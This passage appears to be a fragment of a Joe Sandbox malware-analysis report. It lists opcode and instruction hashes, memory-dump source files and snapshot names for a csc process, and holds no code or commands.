                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4283962b018fa77ae883a3a5a669f4ed538ecaa6ef1e5691627a5fa8a45fe845
                                                                                                                        • Instruction ID: 57260eacb209d5203fec10797c1badbdb1a0606addc22065145a3f41fbfe9fa8
                                                                                                                        • Opcode Fuzzy Hash: 4283962b018fa77ae883a3a5a669f4ed538ecaa6ef1e5691627a5fa8a45fe845
                                                                                                                        • Instruction Fuzzy Hash: 8590027104460D8B4780379974895957B5D95549267800155F60D415015A556C5155A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789447683.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd